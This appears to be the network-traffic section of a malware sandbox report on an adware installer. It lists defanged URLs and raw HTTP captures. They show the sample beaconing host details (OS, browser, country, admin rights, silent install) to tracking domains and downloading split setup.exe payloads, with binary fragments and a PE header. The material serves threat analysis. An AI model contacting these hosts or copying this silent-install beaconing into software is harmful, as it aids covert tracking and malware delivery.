hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1504&action=na&ms_vr=3&clock=7422&rnd=3827208.85.150.249
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843
hxxp://ipgeoapi.com/107.20.198.133
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=1504&action=na&ms_vr=3&clock=20031&rnd=32150208.85.150.249
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_b69.16.175.10
hxxp://stats.ourinputdatastorage.com/installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=142559784754.231.64.164
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=142559784354.231.12.124
hxxp://errors.ourinputdatastorage.com/installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=142559784754.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=142559785054.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=142559785054.231.12.124
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_a69.16.175.10
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=142559785154.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=142559784954.231.12.124
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_d69.16.175.10
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=142559785254.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=142559785154.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=142559785054.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=142559785154.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=142559784754.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=142559785054.231.12.124
hxxp://stats.ourinputdatastorage.com/installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=142559785254.231.64.164
hxxp://stats.ourinputdatastorage.com/apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=142559785254.231.64.164
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=142559785054.231.12.124
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_e69.16.175.10
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=142559784854.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=142559785054.231.12.124
hxxp://logs.ourinputdatastorage.com/monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=142559784369.16.175.42
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_c69.16.175.10

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 HTTP/1.1

Host: logs.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 05 Mar 2015 23:24:07 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1425597847.dop003.fr7.t,1425597847.cds021.fr7.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 05 Mar 2015 23:24:07 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1425597847.dop003.fr7.t,1425597847.cds021.fr7.c..GIF89a.............,...........D..;..

GET /outil/fuully/styi2/setup.exe_e HTTP/1.1

Host: dl.ourgenstatsstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 05 Mar 2015 23:23:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1425462000"

Last-Modified: Wed, 04 Mar 2015 09:40:00 GMT

Cache-Control: max-age=2511

Content-Length: 2530648

Content-Type: text/plain

X-HW: 1425597835.dop001.fr7.t,1425597835.cds033.fr7.sr,1425597834.dop005.dc1.r,1425597835.cds023.dc1.c,1425597835.cds033.fr7.pr

..m.8_...u.>6.....n8..H...v......r....'.....x.8..F.LJ~&Q...z..>U.......[V@....D....$^..1.'...g9....:<.k>...(..fB...`7...r.......Q.:7Qiq.<..f\........WH.....m.F...Nu......O..\.m.UA$.T})_.fV}...M..J...7....F...o...l.<...a.d..D..3...(E.T\6.>.45..'.~.4...g..F....&.3y1b..}....O~.P@..........8......<=.@...c.K.........J..l....Y..}Z...........wu.c...W..Y(6Fd....ye..........j8.j.e...v.M...:;..Q. I..E.....o...].|.[.8%L...$.]>...5.....F.J.......3-\.;.C.<..v..)....?.{.(c._.7t..Y...b..O.....-0...8... |..h..WU'h..1.w..h.....s.H.\8..........~......j.sd...$._...G...9.c>.b.vh..*.r...%,..7W(.m. h...i....7..I.U...7.c.T..&Z(.vO.r9u....4.V...-.,|C...~....N..z....V.OB$[....E.<{......^...h..)..{A2ZE.\..Y.aq.'.. ...]..x.n.....Z...:.S.....v......l...C...:..oa.@.. .....'..Z.<f.....^.r;.;..'..'...G...hR.Uh.Y.........^.g...Kx..|z....{-.k/`.....qjds.....^Xc ....#z..7_.<~,o.. ..x..t<.. .5$@.F./..|.r.e.g&r.5....~?.0"2[S#......[..9...*8d.$2Xr.....G \..y....P.e.. C6p.b..'h.`....@c.:.[...[......92.=>?.hA.d..Ho*..r.-..:....!s.L'8..... .W...1.I......>O.4....D...!...7$..e..)..s....a.V.=.....[#oyV.......&.b..N.I....}..aS...l.Nhji........6.........9,..|..d.....|{....H..........A].q..>..f1c..jv3.....'.*..'Q....;lr..T"......'.X.>3.^.7.I..6Y...8..-.w.9.4h..$2.yK............S~.a>.z....5...$... .=..,.~.....y/iMs.W....h.b..........D......B.....$.3....E~h.h....g....o.0#.....M..cNUiC6}..{........WlC./...<R.Q.IAH._..*...q<.D...e.A.....L.R@9PueM....jX6-...&m..q-....z.......@z..a........L..(.X..

<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Thu, 05 Mar 2015 23:23:54 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?error=done_mem_0&report=mini_s&ver=1504&action=na&ms_vr=3&clock=20031&rnd=32150 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Thu, 05 Mar 2015 23:24:13 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /outil/fuully/styi2/setup.exe_b HTTP/1.1

Host: dl.ourgenstatsstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 05 Mar 2015 23:23:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1425461993"

Last-Modified: Wed, 04 Mar 2015 09:39:53 GMT

Cache-Control: max-age=2512

Content-Length: 2530652

Content-Type: text/plain

X-HW: 1425597835.dop001.fr7.t,1425597835.cds006.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds027.dc1.c,1425597835.cds006.fr7.pr

..................S....<bS.d.,.......#.....\.9....=`...az.a.Ne.....I.Z..%.~....Ea5..P.q..;.<..,U.Y...kjO... 3o......-(..0...ll..;[.-....46....o...w03....]|T:{u.....Q.Q....bz.......=...S?q....f1-:T..%.%cLo*C4.l..!.fq..Tc....X".X..ME..!..#B7.z.`e.*{.I.~\.J.0......n..d......'^.(......ab...=.YF.\........... ........p..g..?._.._......]}.`..j.h...L..q.c=......5..I..r1Vt.^.g.' ...}.z.......h>..@"._z..5..<.E<.}.R..ib.p..../T.e.B.k...%.6.5:.>..r.[F@..[...w..u..=..D....4<Z6.....Kd.b..@Q.ku.i.).{~^.r3.....#k.J.........B{....k...K.......}.`.L~....Dt.E../..*J.....z......Z..n.V.....Na...x.R.m~N....=..YU..... ........%Q..~..mG@.w>.j......p.GZ../.D.T.RY..... .R..fPx.....T.......4;...\I..R.wH..3oj....k...9.3L\..Z....J..c...Mj.P@'...1.. ......QV......H@UB....A.E\...v..2..[?..w.a.e.ob..Oh...h...Q..9R.......g..<.....3.!.O.&(....4_..........2%..p..N.E..]Z.\.O..q...0.8...G.6;.9].....s.......F|...g.B.\2.#..h?........D.<..P9J.........P..SO"T.....t....#....v.r.....,>5..W...W... .w...[_..{Q...h......r..9..j.*...<WVH.cZ..9&..........b.IS.,.2..!.QE.W?._..5..0v..1....cY.....V..X....=.`.t.....nQg.1[...<.9:.....2a$.'.1.EZ.?.,..1..~..}........B.MN.]r.........V.j5S...Et...H.n..v.k.J.X.j....x.A.......:.......r...}.........J=./..b..../D........-. W%z.c.1U*4...?.y...CuV.ST.x.A...$...p..)...v.....V...JF$.;...;AhW._"n......za....C@D......jF.~.Z..!V..~...I....y..........266.L...D<s..Z..P5}.a..rH.#..}.U.......*...;q-B.de.\4..[....r>...i.p.....(......&..o...A.yr.9....p...1.b............FW#...o.......F.Sq..

<<< skipped >>>

GET /utility.gif?error=mem_strt&report=mini_s&ver=1504&action=na&ms_vr=3&clock=7422&rnd=3827 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Thu, 05 Mar 2015 23:24:00 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /outil/fuully/styi2/setup.exe_a HTTP/1.1

Host: dl.ourgenstatsstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 05 Mar 2015 23:23:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1425461991"

Last-Modified: Wed, 04 Mar 2015 09:39:51 GMT

Cache-Control: max-age=2511

Content-Length: 2530652

Content-Type: text/plain

X-HW: 1425597835.dop010.fr7.t,1425597835.cds002.fr7.sr,1425597835.dop010.dc1.r,1425597835.cds014.dc1.c,1425597835.cds002.fr7.pr

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......P.....................n......-A............@........................................... ..............................p.......................................................................................................................text...<........................... .0`.data...............................@.0..rdata..8$.......&..................@.0@.bss..................................0..idata.......p......................@.0..ndata...@....... ..................@.0..rsrc...............................@.0.................................................................................................................................................................................................................................................................................................................................................................................U..WVS.......U..E....t...F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E...$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT........FP..E........}..VP........U.......FT.............}..........E..M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q....~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX..$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..

<<< skipped >>>

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 05 Mar 2015 23:24:06 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Thu, 05 Mar 2015 23:24:06 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /outil/fuully/styi2/setup.exe_d HTTP/1.1

Host: dl.ourgenstatsstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 05 Mar 2015 23:23:55 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1425461998"

Last-Modified: Wed, 04 Mar 2015 09:39:58 GMT

Cache-Control: max-age=2512

Content-Length: 2530652

Content-Type: text/plain

X-HW: 1425597835.dop008.fr7.t,1425597835.cds027.fr7.sr,1425597835.dop004.dc1.r,1425597835.cds018.dc1.c,1425597835.cds027.fr7.pr

.b....:-.\....K........J..n<.....U5r.96_.Gd..~.q...ki..z_<.........LzcF.....q4..c.#.0E..\.O...p:LM...".0H.....6![:%..r..Z.{(.....x.....a..Mo.s.BW...3.E>..=c.*.n=.....%.s.V......t7y.|....FF....9z......{z...:3.. ;Z.G..a.Q..Oe..........G.e..m...v.:^.M30..-.....c.>jo,TR.^.....m.Vb....%.z.........Dp.DE.............U....q..&.......D..o$.EC.#E....*.. ..N.u.K.5.z..\.".I._.....up..:9..Y..B0.i...9kF.q...pc....\(v.,.r...^z.7(.o..D..}...I..mT..X.R.s.....f...:..*R2bk..T0r0.....,....O......x.F....i.Q....,..9:;o.&...s...'Z...X..3.}.K..Ox!~..VQ...*.....@.... 4.#}[...J...J...*........N.4.\A..~_.b...A......V..`..6xdH....B..A..]...VY....4Y,...~.,...A.....f..R....<N..G.OxJF...e....Y...]W...|.1......<....]......J....v...^>X,...}v..rN;...i..0........>..].......:3...E.. .....[....?.!a.3.$.C.b..N...7.........L.k/m.....kw'...No"jD..y...0..d.@..>.iM&.W...A.Y....B.......^..U .jw....J...-M.......(..|....m..|-.....8.p. .{.g..i(.....~R.].:.Bl.bW.\GK1zY..3A..O....jc.I:...5....5........1.....Q>na..lGRDy..<.29.(....5Y...<.~.f.z....."..a...&.{....B.....B....u.6...B.[..$.1...v...8}n.....:..*A..x......Zy.........M"k......L=|..E....].....&k{..k.S..~...R3.w..I.....3...Y./..s.E..>.......... ."...f..v.W..P.........GyLvwM5._..,B.BV.\.{C(....h.c..........."..9....8.;..^.L.S...8c.d.AN..S.|$..%>Z]..5.TS}.A.F...s.O......>....)......}2.M<#m........J.m...).X.Yl."M.U..2p... )LT.F........&6%. .K..H.q.c.....ww...$...?|..74 FP$........{..-.........E.i...CYh.h...Z..UK.....[............D...kV]...gS...&R4..m..&.U..w4

<<< skipped >>>

GET /utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: 9Tcz6Ap2zlSZV0IH8Q0 cp3VYmVmZwbuStx2HER yoGe2LQ6oKSmqfJh/P dQdqy

x-amz-request-id: A16DE0E2CD020B49

Date: Thu, 05 Mar 2015 23:24:05 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9Tcz6Ap2zlSZV0IH8Q0 cp3VYmVmZwbuStx2HER yoGe2LQ6oKSmqfJh/P dQdqy..x-amz-request-id: A16DE0E2CD020B49..Date: Thu, 05 Mar 2015 23:24:05 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: hRdx8sPtaImFrGl9EBBSqJs3pgIH/3/woCiEIfFpvrikloxlO4WeiMK0y9EowX5M

x-amz-request-id: 28EEC20B1021BA7F

Date: Thu, 05 Mar 2015 23:24:08 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:37 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: hRdx8sPtaImFrGl9EBBSqJs3pgIH/3/woCiEIfFpvrikloxlO4WeiMK0y9EowX5M..x-amz-request-id: 28EEC20B1021BA7F..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:37 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: dHcCGtITcro3krS3zzCUBB/PyBJcOmeanAIOwt1zjHpRd EhrSMar7sNev tM0Zs

x-amz-request-id: 217FED2A048E8812

Date: Thu, 05 Mar 2015 23:24:08 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 HTTP/1.1

Host: errors.ourinputdatastorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: aiz9xgvD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x

